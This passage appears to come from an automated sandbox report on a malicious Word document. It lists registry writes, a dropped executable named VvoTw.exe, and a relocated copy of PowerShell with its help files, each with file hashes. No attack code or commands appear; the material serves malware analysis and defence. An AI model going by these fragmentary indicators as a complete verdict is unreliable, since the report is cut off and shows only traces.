000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1324482609
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1324482610
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1324482609
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
C0AC079DA84B4CBD8DBAF1BB44146899
01000000270000007B39303134303030302D303033442D303030302D313030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1324482610
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482634
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482635
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1324482611
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1324482612
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1324482611
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1324482612
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482636
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482637
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482638
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482639
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482640
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482641
1784
VvoTw.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\71\52C64B7E
LanguageList
en-US

Files activity

Executable files
13
Suspicious files
0
Text files
123
Unknown types
3

Dropped files

PID
Process
Filename
Type
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll
executable
MD5: 54efe3c64894d8001451cfcadf9c0f3c
SHA256: 52fbddd19233ecc3f43ce229f6ea525c6775f435445e4811421195c40f8f569d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\pwrshmsg.dll
executable
MD5: ce9fbe8ee03e772b49e0b269de5069a3
SHA256: bd674e836e28607103ca5801b8f6dbe662a8c35e0aaa5dbce3e57603845fb7b7
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll
executable
MD5: 348e5beda10b9d600f7d40cc3b9d8755
SHA256: 7c2d083520d74993f1aa90a193f599c7c9a7a7bd8cd00558d72cc0d24162f314
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\PSEvents.dll.mui
executable
MD5: a2972815d82bd444ab64263216d616b6
SHA256: 54573713758b342184f1f4cd8a2e9b08bac4db17a850962940c32c1afafc0d18
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\PSEvents.dll
executable
MD5: a3aec703e2d459b908ed4ca8c40c3e1a
SHA256: 89fdb476aa9973527816c9ddaf180c7d162dbd823b3690d03279221b07fef170
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\pwrshmsg.dll.mui
executable
MD5: 21826a427fba5149052782c243064ed8
SHA256: 17d235494bbe4ea840b5227b24af17d6a6d34a458f427f8227b3f53d79683ecd
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\powershell.exe.mui
executable
MD5: 49c5858f6511670eeac8d62ab5d5f4a1
SHA256: 7942dd782bc87a56db08cd89cc6d04a139cb12ad8d0dbf8ecd80862a5ceef56e
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exe
executable
MD5: 852d67a27e454bd389fa7f02a8cbe23f
SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\pwrshsip.dll
executable
MD5: 1908ffadf1d45f0eeb0ffa541b677aeb
SHA256: 61acb031987c0b5e3295dc1331ad93f32e7127f5d5dd4f28f649cd3765208014
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\pspluginwkr.dll.mui
executable
MD5: fe0bac0cae9ad76c922a9b2cac3c757e
SHA256: f9b7639aaf79dd4b7fe97d8d47e46ce94ddc25a552c915596da656d71e985b7d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\powershell_ise.exe
executable
MD5: 8e6390b20917929fb31679981b411557
SHA256: c7fd161906c7226e86c7ae00506a1c7862d21ed4bb3fef34a4b20c999a5a3e2a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\pspluginwkr.dll
executable
MD5: 808aa87aa129df48ef94f8f9c58736ce
SHA256: a5d5d9f4adc81138f839d28d59f73f516cf937fcb5fbe2e4659185912874697b
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\powershell_ise.resources.dll
executable
MD5: 10700177263c5e9bc3b889c92614b2cc
SHA256: a6da710e1e959c021b9b62ccdc663e6b5d862e669556be923405e9a5e1be5f8e
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_remote_output.help.txt
text
MD5: 843c7694acdf81c35aada01240e4d43d
SHA256: 19ed68b6696a13bfb38b01f1f8a1ac41771ea319f345d31d2cfe76ad66d33c18
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\TroubleshootingPack\TroubleshootingPack.psd1
text
MD5: 896c9f3b45f00f7efc7328b60274b322
SHA256: 5da66875cb669a50b56eed98d43f03179f8fdf3b0b9062c79da167ce522f9d5c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\TroubleshootingPack\en-US\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll-Help.xml
xml
MD5: 58949cb3dcfd589ae34d5751ea7921bd
SHA256: 57bdfcde06ab9a0a977652761658c6434a75ca8b1b4835af2a106b4c7725c85d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\TroubleshootingPack\TroubleshootingPack.format.ps1xml
text
MD5: 059b2013069e42a394db5cb551e345b5
SHA256: 6dd7dded2fd500f185b4ed8b2dcdbbec1dda0625b6ac0006f4b3e92b7365f120
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\BitsTransfer\en-US\about_BITS_Cmdlets.help.txt
text
MD5: beeb534db71d0cb137206cd4c2d72aeb
SHA256: 6106d0dcad89f50dcbd255b910e959924a72eabc0c63679b0ac789bb5400ec23
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\PSDiagnostics\PSDiagnostics.psm1
text
MD5: e00e79e73582dab9229da82dee52b56f
SHA256: 35278dae074b56251d34c2bd0f0168bf1591083fcc0d9ee4f6a5fd70628645c3
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\powershell.exe
––
MD5:  ––
SHA256:  ––
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\System.Management.Automation.dll-Help.xml
xml
MD5: 2170b1c7496307c0949b54a6dd6f0a54
SHA256: 1168c8dd29c79e11aaaa17362f71969e0f9c3721a1c50c9800c32333f298c2a2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Help.format.ps1xml
xml
MD5: 915f654e42bbff58bb45e199695b9645
SHA256: f88172e876bbf54d22985a789648b393a4cf37fa5c100ef428aed21c3ffe2e41
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\AppLocker\AppLocker.psd1
text
MD5: 2b16aad4e01313f505f21af056730bfe
SHA256: d22787b0b60a2e44c3b80432321b3267f41c3f58ce7bc9080c471ef92e233918
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Examples\profile.ps1
text
MD5: 24b26c8dd3e9507390f320bb82feacff
SHA256: c91af52ebfc73ff82aefbbbefb4bb7526466c8ab7c903beb2f6996a63a54f0b4
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\BitsTransfer\BitsTransfer.Format.ps1xml
xml
MD5: df8df3a9150be3b665af838a81c1adf1
SHA256: bb1694a07d73474839a1ab44de15a16681ecc69003a1c447743b4866e7c1f5ac
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\AppLocker\en-US\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll-Help.xml
xml
MD5: af07b8b898e6d6e01ec6ecad383c5cd0
SHA256: 0ae6eff718f4d81b89e1bdf9acdc7ed4daac47742abf3f0e1efd924a75a28d6b
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\FileSystem.format.ps1xml
xml
MD5: 07b1a0ee828c0aea9957165342c9b0f2
SHA256: ee7c7ea3d313f74f27ae5ec832b9214d3a2731dd62ad3621b7c290119fad56e1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\BitsTransfer\BitsTransfer.psd1
text
MD5: 2c0a6fcb3b6fa091a6dc2649d36249ad
SHA256: a96a2d3da8fc97138378658c8b106db6c4468f576d17878bac5a252b88a02ef7
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\getevent.types.ps1xml
xml
MD5: 8bce15f00bc8e60895ba37f6e3666145
SHA256: bd543ac559e7fee952c01b76bc0b2e2ba92b9b05fbf2b79f228b9a33aa376175
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\WSMan.Format.ps1xml
xml
MD5: 2a365431e43987daf2960f08a49f2679
SHA256: 7cbb42f77ca04293ecdbc69e2633b94725dd03307ca3637bd29fb2d94ed72022
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\BitsTransfer\en-US\Microsoft.BackgroundIntelligentTransfer.Management.dll-Help.xml
xml
MD5: 3f3d8394d810834f7ee9c637fc6bde6b
SHA256: 27a67bc6d62fb41d111123fa5fb4a8c0f934d52cefd9afc98221e99cce41c39c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Registry.format.ps1xml
xml
MD5: ea3e8e9c9e266070d499b0e1a74a54ec
SHA256: de1626c8cd04b43ba157bdbdc548174ebb4d0ab27b0e966fb383150cc8a39f1c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\PowerShellCore.format.ps1xml
xml
MD5: 7868501b2fb334345434ee864db28b81
SHA256: bce501aad2196f4c69f8ca4517a8424aa31e2863fb42de20eba4b689d6255f75
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\Microsoft.PowerShell.ConsoleHost.dll-Help.xml
xml
MD5: a8fc5b9411d34e7f76703299cefdc14b
SHA256: c8afa7c171b8e8c310a7eb86d27d04907ad060197e56f80e05d85c514cc03109
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\Microsoft.Wsman.Management.dll-Help.xml
xml
MD5: 7fea934a844f8c0a7900260324115571
SHA256: 5e3f986ea9b1ffa5d4245d78b378708af82a442d455f2c575aefd6c999428e71
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\types.ps1xml
xml
MD5: 2300a495192fe39d518e167dc5bae6a5
SHA256: 7ee8c9dd51818ce9c2b03442ef20594ba79e26b6b3af87fe08a4790a0c34bf7c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\Microsoft.PowerShell.Commands.Utility.dll-Help.xml
xml
MD5: a9d465b5d2ef20ae266e70352300d640
SHA256: 9e8c2473303abf1e4410cfc9a72065f29524a04306f0dff0e44bc143e7002f34
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\Microsoft.PowerShell.Security.dll-Help.xml
xml
MD5: c25f7a8e570f8dbad4c416c109877660
SHA256: f886dd98b69382259a0f63c26b565af24a9368267ef60ee16ef49b00a7a66500
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\Microsoft.PowerShell.Commands.Management.dll-Help.xml
xml
MD5: dd69d8010bdfc984bf4afe463e0a5ce6
SHA256: 086b8c991bb8639e536e504456b24650a16b2e1a8eb7c55e7e0c92bc4fc9085c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_WMI_Cmdlets.help.txt
text
MD5: cba26a7e65800101048204b291bccca0
SHA256: 97fc421761f23ad21f1ab0c6677e018fc8e3be94f9000f9ccb8f16afb5a53de7
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_WS-Management_Cmdlets.help.txt
text
MD5: 767cd05db429f751517300fae098b1e2
SHA256: f2e579fdc195265c5b1b4523e82ca78540e136fc618ffc01db8de443bb3b296d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Windows_PowerShell_2.0.help.txt
text
MD5: d60451979004b7b169b159fecdc81adb
SHA256: 1f075d3c6e53f72aa7a991fed26a64aafe6ba687f233bcb3a342ab4d6726431f
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_type_operators.help.txt
text
MD5: a4918d1fefcd62645a968fea60fb8a43
SHA256: 288eed9b5e01a259f546da5a44e08e53240d416587461bbc4bdd1c9092975b7a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\Microsoft.PowerShell.Commands.Diagnostics.dll-Help.xml
xml
MD5: 0ed4fc1248791de840904a2667532ea1
SHA256: 888ba7505afa707502ed8897e7a548fe2a7ed06e0aeb9b5d0e528a201e77be4a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Variables.help.txt
text
MD5: 4323f3895923d9863b52bf077b3c4054
SHA256: 7a98e56b6249e1b60425857d1c733fbd2cce0bf5e0848ce17e711f860851a6d2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Windows_PowerShell_ISE.help.txt
text
MD5: 9733f911f9ffeabe830c78606c7595ce
SHA256: 4cc6d261a332c1bbd19d907e749ab2fe5dfc626fa3009130ad96ad7932973f44
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\ImportAllModules.psd1
text
MD5: 9e3c02c4befa85398de72b52dd39c29a
SHA256: b71e6e8b3bc606b072f7259f339710eb68bcc7f09a488b0eb9c5058afb156d4b
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_While.help.txt
text
MD5: c1492a84c53feb39651faf9c3dced879
SHA256: 74077aefd669655631d393c7d71648446bcd81fb974c96071786127cc690a4e3
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_types.ps1xml.help.txt
text
MD5: 56d4528792d5a6b440b94473ef182858
SHA256: 9bfb2a721d6eef54a9fb57c792351eee2ca7a8bf0cd0beefcf6f01ea184acc53
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\default.help.txt
text
MD5: e179134ddc1c768d862464d6e4a8511f
SHA256: 13b1d2c9eb465c94197b8e9d93cf72063b083f2964f3d835d1c1f8414a21f7a1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_try_catch_finally.help.txt
text
MD5: f22634a9aac67ce9687113330547515a
SHA256: 92176d04ae1fdc1ba160d67e7af57065eecbf81cfdd3e499a446a0cec9ee1f86
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_wildcards.help.txt
text
MD5: 9d8c038c6f4abc57a9ce890367170169
SHA256: eba0d9e613186b60ffe3194ab3dd3e9f21f859526ab682029bf1a7026926c5b1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Throw.help.txt
text
MD5: b8c5970eb2ff62a8853d8bb7818f3d7f
SHA256: 7a684d77cde10addf0ecfa506a0d20bc69c4395a33e2eb9565cdb3a721e12a84
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_split.help.txt
text
MD5: f043457ffa8368c9aa4abb83bbf184f3
SHA256: 93d2f8789590177a75ba5a642f4cd1e5a92a1a9e4eb44f18a870f8341ea178f2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_remote_jobs.help.txt
text
MD5: 2b9449d6f7bfab7adcbd7c2df999638d
SHA256: d20188c06d8abf31fb3f5d641ce0226a85063af8bb20046939b103562708b551
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_remote_troubleshooting.help.txt
text
MD5: 1bacdfd726f266e6e088224fe0b14b21
SHA256: 9beed907031ab92bcd7e43e17c93382ddcad378a2276f3e2f51008a5cbb04bdb
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_requires.help.txt
text
MD5: 889cbc7ac1d723e66f09ce61380b46e9
SHA256: 7b58fb203cb4faad3923b70e39e570fe95251fd893210427c883ff9ae4077112
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Return.help.txt
text
MD5: f9fa7df0fcc61cc286f0123e5dfce3c1
SHA256: 186300249a6de81a6ba1fddbfa6927dfcaebab0371ddfb180583126cd0b9c29a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Switch.help.txt
text
MD5: 34647bcf99a3cda9b1420976da2193fd
SHA256: d3b4d8a1933470f997e062090a336c7d37769115e209aa27ffcd7ef1b2502f36
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_trap.help.txt
text
MD5: b17bdcc8e7414428f11bfce93eccd0a8
SHA256: 743d625f624819d64b274ce3811e35ff41c8c65dd4de3e27e76dcd57ea812e78
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_script_blocks.help.txt
text
MD5: 2358193b0f5f79220dfbc03d7a505ac2
SHA256: 8636be3b0ec4679b49e44d4309e453fc9039d60c065fbb5dc467cd20e1fadea2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_transactions.help.txt
text
MD5: 8615bd31d5ce19bbffc951892c0bb549
SHA256: 6fc67c20e69752bd2c729f9e63de09308811f96c7cfdbfecdad0b1c3882de269
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_remote_requirements.help.txt
text
MD5: c850cdb6e283b9194aa597d418412818
SHA256: 2b13987b0f7fa7ed66662bf4661f8f0f1f18778e9d78f9a869caa826c41de640
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_scripts.help.txt
text
MD5: 09f74326137427abc97c47918983e60a
SHA256: 13e8ac0907085c6b8f9ef11977533bfa0f76ef4e5f32b09a306836280d4cdaf8
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Signing.help.txt
text
MD5: 347d106a0b234e6f7c714fb5c5e1cebc
SHA256: 29e6144b13bdb4e4f6ee990a05ff88733b1331b96f993fef348eccf6689628be
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Special_Characters.help.txt
text
MD5: 6eec4c5e1607a434fef0f6c9807343c2
SHA256: df6ef01ccf0614ed74e9a469266691fc5dfb3e23b13871394734a5b4275e91c0
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_script_internationalization.help.txt
text
MD5: f103bba2417482e5be5cfb258ad26cc6
SHA256: c1cc99c069e49d5ea153ffcaf9e2dd82ac0d2718c04673430d02e8adbf1dea1d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_scopes.help.txt
text
MD5: 696344c2f8c79c4cd76e9c61360817b4
SHA256: ba61159b055b683e5c4406342caaa557ac3c228c175a4f83b2bb1316dfb9dfd7
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Reserved_Words.help.txt
text
MD5: 65c8d0fe33ec0a8124aab2494d8ec82e
SHA256: 90fad4f20b37e7c86de11741eceb68337be1c52f5631678d79661431d3a1b3a2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVRACCD.tmp.cvr
––
MD5:  ––
SHA256:  ––
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Session_Configurations.help.txt
text
MD5: 8146b0eeb5cbc6f81fa7c5a594605619
SHA256: 2b598ae9c27625cf4e92bc87aaba0a7e19216adf1c3e00d28d792b526b569ee1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_prompts.help.txt
text
MD5: 2052b9df9dd514258d12f9c28cd8b9fc
SHA256: eaf5f3bbb64fe197ee63deb95f9f643d9c7b3135358929f93819a92175def42a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_preference_variables.help.txt
text
MD5: 14d287caa7b2c85b4e29fe9fd070fcea
SHA256: c740fdb99bd6aa8edddce9837d34e317ae7d6f2a7b8057b708d1b5a0f4332d0a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_properties.help.txt
text
MD5: 33f20bf86e538531e63d438dd507d074
SHA256: 99ebbf2849ccdcbbdfc6d4d08a10ea17dfa61d7890a03107b531c00f0c38dfe2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_pssession_details.help.txt
text
MD5: 9d0cecf572ac565927552bd659773d81
SHA256: 2d3fb06dd2edf4172e3702d886015f491128ab7a5ae826760196c729888d7fff
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_profiles.help.txt
text
MD5: 8d5da8c76b0d1b7bb6008aadb11f3905
SHA256: ddb621ba8624aafeb28a33a57248f18368b3f1e5b999637d29253def23b8d6f5
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_pssessions.help.txt
text
MD5: 78fda14f35ae390f32afc9ba9766bb78
SHA256: d65ec7906a1bcb8187e8aab371880a0bb52b99ad89e66bd3843a38331ae85c81
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_remote_FAQ.help.txt
text
MD5: db3b55bf4ccb6088f30c5b7fd67ac967
SHA256: 40de3059b29a805278fd96e2b3b18595010180538da937606113f3bc76db1a4c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Quoting_Rules.help.txt
text
MD5: 664fcfdfb16222061e1922a7e5faff48
SHA256: d3ff393ca9e7eac03b4100d13708df42ae4d9e87a960593d54a5c32e0f0e92ff
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Redirection.help.txt
text
MD5: 0f9f0cfef5ee3ec63edebf33b819b9b4
SHA256: eac4c83c40399c2293c757a2a9256beac8eeb7dbe0f0a2a828f361c6bcb82ce4
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_providers.help.txt
text
MD5: 48b2fc4920cae7bef7958f3236fda34f
SHA256: 41adbafa18c051880e4e487d56c8ef4bdbbf72f10e2823993596aff8481c7777
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_remote.help.txt
text
MD5: 69421c53ecc0e4ff792980ee25308582
SHA256: f02c47cd1b8a37cff1d6e54f15d1fc6f276f92497ec9e9d1f595698fb0c54144
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_pipelines.help.txt
text
MD5: ea96217fa09366fb2aa409c053b4d600
SHA256: 25b371904f2b56eeba166379041c68fb9372875f6accf6cef668d47c6a0d9a05
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_PSSnapins.help.txt
text
MD5: 74b82613f6a8d27e1c37e52137b91f6d
SHA256: 000e798faac3e5dc3686c386a0515ccd5c23f50f59b645fded1d6a9b7fd06c23
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Ref.help.txt
text
MD5: ea24480ed2044d9d5c0aafe278701d8a
SHA256: 10ff4b59cde544688d89ad07dc5e230658556ba187e2b378c8ae6a52752b0d69
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_regular_expressions.help.txt
text
MD5: 8cdb943f0be785d4ff09b767fa9aae72
